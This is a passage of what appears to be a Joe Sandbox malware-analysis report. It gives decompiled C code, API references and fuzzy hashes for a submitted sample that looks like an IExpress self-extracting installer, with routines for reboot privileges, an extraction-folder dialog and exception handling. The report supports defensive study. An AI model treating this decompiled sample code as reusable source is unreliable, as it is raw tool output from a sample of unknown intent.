                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E001F44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E001F6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E001F44B9(0, 0x522, 0x1f1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E001F1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x001f1f90
                                                                                                                                                                                                        0x001f1f90
                                                                                                                                                                                                        0x001f1f93
                                                                                                                                                                                                        0x001f1f98
                                                                                                                                                                                                        0x001f1fa4
                                                                                                                                                                                                        0x001f1fa7
                                                                                                                                                                                                        0x001f1fc5
                                                                                                                                                                                                        0x001f1fcd
                                                                                                                                                                                                        0x001f1fdb
                                                                                                                                                                                                        0x001f1ee5
                                                                                                                                                                                                        0x001f1eea
                                                                                                                                                                                                        0x001f1ef1
                                                                                                                                                                                                        0x001f1ef4
                                                                                                                                                                                                        0x001f1f0c
                                                                                                                                                                                                        0x001f1f2e
                                                                                                                                                                                                        0x001f1f3a
                                                                                                                                                                                                        0x001f1f46
                                                                                                                                                                                                        0x001f1f4d
                                                                                                                                                                                                        0x001f1f58
                                                                                                                                                                                                        0x001f1f60
                                                                                                                                                                                                        0x001f1f61
                                                                                                                                                                                                        0x001f1f62
                                                                                                                                                                                                        0x001f1f75
                                                                                                                                                                                                        0x001f1f80
                                                                                                                                                                                                        0x001f1f77
                                                                                                                                                                                                        0x001f1f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1f77
                                                                                                                                                                                                        0x001f1f64
                                                                                                                                                                                                        0x001f1f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1f64
                                                                                                                                                                                                        0x001f1f0e
                                                                                                                                                                                                        0x001f1f0e
                                                                                                                                                                                                        0x001f1f13
                                                                                                                                                                                                        0x001f1f13
                                                                                                                                                                                                        0x001f1f14
                                                                                                                                                                                                        0x001f1f14
                                                                                                                                                                                                        0x001f1f16
                                                                                                                                                                                                        0x001f1f17
                                                                                                                                                                                                        0x001f1f1a
                                                                                                                                                                                                        0x001f1f1f
                                                                                                                                                                                                        0x001f1f1f
                                                                                                                                                                                                        0x001f1f86
                                                                                                                                                                                                        0x001f1f8f
                                                                                                                                                                                                        0x001f1fcf
                                                                                                                                                                                                        0x001f1fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1fd3
                                                                                                                                                                                                        0x001f1fa9
                                                                                                                                                                                                        0x001f1fb4
                                                                                                                                                                                                        0x001f1fbb
                                                                                                                                                                                                        0x001f1fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1fc3
                                                                                                                                                                                                        0x001f1f9a
                                                                                                                                                                                                        0x001f1f9a
                                                                                                                                                                                                        0x001f1fa2
                                                                                                                                                                                                        0x001f1fd9
                                                                                                                                                                                                        0x001f1fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 001F1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 001F1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 001F1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: d0ccb8fcf9c59dab204502a5979ea36731fe9280c417adf73f7a8dc017a34acc
                                                                                                                                                                                                        • Instruction ID: ca79ae9be7cc1c0d82f254b7f4c17bdfb7cb62e5128b2f732a79f307ebb52305
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ccb8fcf9c59dab204502a5979ea36731fe9280c417adf73f7a8dc017a34acc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C32108B1B4420DFBDB209BA19C4AFBF77B8EF95B10F510018FB06E6581DB788845D661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x001f6cf7
                                                                                                                                                                                                        0x001f6d00
                                                                                                                                                                                                        0x001f6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001F6E26,001F1000), ref: 001F6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(001F6E26,?,001F6E26,001F1000), ref: 001F6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,001F6E26,001F1000), ref: 001F6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,001F6E26,001F1000), ref: 001F6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: 178943c7044d576e57bac5de966652ca60131a797fd4d5bbc143bdf6aee25330
                                                                                                                                                                                                        • Instruction ID: 22bd11215e629f3fb3e60994e6d89f4a7a975e67b0e77ce34557fd6b3a72a73b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 178943c7044d576e57bac5de966652ca60131a797fd4d5bbc143bdf6aee25330
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3D0C9B2008108BBDB002BE1EC0CA693F28EF48212F864000F31E82860CA3A9491CB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E001F3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E001F43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0x1f9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1f91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E001F44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0x1f91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0x1f91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0x1f91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0x1f91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E001F658A(0x1f91e4, 0x104, 0x1f1140);
                                                                                                                                                                                                        								_t27 = E001F58C8(0x1f91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0x1f91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0x1f91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E001F597D(0x1f91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0x1f91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0x1f91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E001F44B9(_t64, 0x54a, 0x1f91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0x1f91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x1f91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0x1f91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0x1f91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0x1f9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0x1f9a3c, 0x3e8, 0x1f8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E001F4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1f87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E001F44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x001f321b
                                                                                                                                                                                                        0x001f321e
                                                                                                                                                                                                        0x001f3221
                                                                                                                                                                                                        0x001f343c
                                                                                                                                                                                                        0x001f343e
                                                                                                                                                                                                        0x001f343f
                                                                                                                                                                                                        0x001f3445
                                                                                                                                                                                                        0x001f3447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3447
                                                                                                                                                                                                        0x001f3229
                                                                                                                                                                                                        0x001f322a
                                                                                                                                                                                                        0x001f322f
                                                                                                                                                                                                        0x001f33ec
                                                                                                                                                                                                        0x001f33f7
                                                                                                                                                                                                        0x001f3410
                                                                                                                                                                                                        0x001f3416
                                                                                                                                                                                                        0x001f341d
                                                                                                                                                                                                        0x001f342d
                                                                                                                                                                                                        0x001f342d
                                                                                                                                                                                                        0x001f3438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3438
                                                                                                                                                                                                        0x001f3237
                                                                                                                                                                                                        0x001f3243
                                                                                                                                                                                                        0x001f3243
                                                                                                                                                                                                        0x001f3246
                                                                                                                                                                                                        0x001f32ee
                                                                                                                                                                                                        0x001f32f4
                                                                                                                                                                                                        0x001f32f6
                                                                                                                                                                                                        0x001f33d4
                                                                                                                                                                                                        0x001f33d6
                                                                                                                                                                                                        0x001f33db
                                                                                                                                                                                                        0x001f33dc
                                                                                                                                                                                                        0x001f33de
                                                                                                                                                                                                        0x001f33df
                                                                                                                                                                                                        0x001f3370
                                                                                                                                                                                                        0x001f3372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3372
                                                                                                                                                                                                        0x001f32fc
                                                                                                                                                                                                        0x001f3301
                                                                                                                                                                                                        0x001f3301
                                                                                                                                                                                                        0x001f3303
                                                                                                                                                                                                        0x001f3304
                                                                                                                                                                                                        0x001f3304
                                                                                                                                                                                                        0x001f330a
                                                                                                                                                                                                        0x001f330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3313
                                                                                                                                                                                                        0x001f3318
                                                                                                                                                                                                        0x001f331a
                                                                                                                                                                                                        0x001f3331
                                                                                                                                                                                                        0x001f3332
                                                                                                                                                                                                        0x001f333a
                                                                                                                                                                                                        0x001f333d
                                                                                                                                                                                                        0x001f337c
                                                                                                                                                                                                        0x001f3388
                                                                                                                                                                                                        0x001f338f
                                                                                                                                                                                                        0x001f3394
                                                                                                                                                                                                        0x001f3396
                                                                                                                                                                                                        0x001f33a4
                                                                                                                                                                                                        0x001f33ab
                                                                                                                                                                                                        0x001f33b6
                                                                                                                                                                                                        0x001f33be
                                                                                                                                                                                                        0x001f33c3
                                                                                                                                                                                                        0x001f33c5
                                                                                                                                                                                                        0x001f3435
                                                                                                                                                                                                        0x001f3437
                                                                                                                                                                                                        0x001f3437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3437
                                                                                                                                                                                                        0x001f33c7
                                                                                                                                                                                                        0x001f33c9
                                                                                                                                                                                                        0x001f33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f33cc
                                                                                                                                                                                                        0x001f33ad
                                                                                                                                                                                                        0x001f33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f33b4
                                                                                                                                                                                                        0x001f3398
                                                                                                                                                                                                        0x001f3399
                                                                                                                                                                                                        0x001f339b
                                                                                                                                                                                                        0x001f339c
                                                                                                                                                                                                        0x001f339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f339d
                                                                                                                                                                                                        0x001f334c
                                                                                                                                                                                                        0x001f3351
                                                                                                                                                                                                        0x001f3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f335c
                                                                                                                                                                                                        0x001f3362
                                                                                                                                                                                                        0x001f3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3366
                                                                                                                                                                                                        0x001f3367
                                                                                                                                                                                                        0x001f3369
                                                                                                                                                                                                        0x001f336a
                                                                                                                                                                                                        0x001f336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f336b
                                                                                                                                                                                                        0x001f331c
                                                                                                                                                                                                        0x001f3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3329
                                                                                                                                                                                                        0x001f332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f332b
                                                                                                                                                                                                        0x001f324c
                                                                                                                                                                                                        0x001f324c
                                                                                                                                                                                                        0x001f324f
                                                                                                                                                                                                        0x001f32c8
                                                                                                                                                                                                        0x001f32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f32ce
                                                                                                                                                                                                        0x001f3251
                                                                                                                                                                                                        0x001f3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3271
                                                                                                                                                                                                        0x001f3277
                                                                                                                                                                                                        0x001f3279
                                                                                                                                                                                                        0x001f3298
                                                                                                                                                                                                        0x001f329d
                                                                                                                                                                                                        0x001f329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f32b0
                                                                                                                                                                                                        0x001f32b6
                                                                                                                                                                                                        0x001f32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f32be
                                                                                                                                                                                                        0x001f3280
                                                                                                                                                                                                        0x001f3289
                                                                                                                                                                                                        0x001f328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f328e
                                                                                                                                                                                                        0x001f327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,001F8598,00000200), ref: 001F3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 001F3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 001F3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 001F342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 001F343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-3152218896
                                                                                                                                                                                                        • Opcode ID: 50bb11186f9df2bcfd0e2c99637df501313abc332fffbbe6881812c16d672536
                                                                                                                                                                                                        • Instruction ID: 3f28f8cf24ef599aafbaabaec784ef7644786db711b4e9d8f5ace696a0ae8652
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50bb11186f9df2bcfd0e2c99637df501313abc332fffbbe6881812c16d672536
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4517B7038424C77EB21AB355C8CF7B295DEF96B54F504028F729E65D0CFA88E41E261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0x1f9a3c = __ecx;
                                                                                                                                                                                                        				memset(0x1f9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0x1f8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0x1f88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0x1f93ec = 1;
                                                                                                                                                                                                        				_t20 = E001F468F("TITLE", 0x1f9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0x1f858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0x1f9a34;
                                                                                                                                                                                                        					if(E001F468F("EXTRACTOPT", 0x1f9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0x1f9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0x1f9120 =  *0x1f9120 & _t65;
                                                                                                                                                                                                        							if(E001F5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0x1f8a3a == 0) {
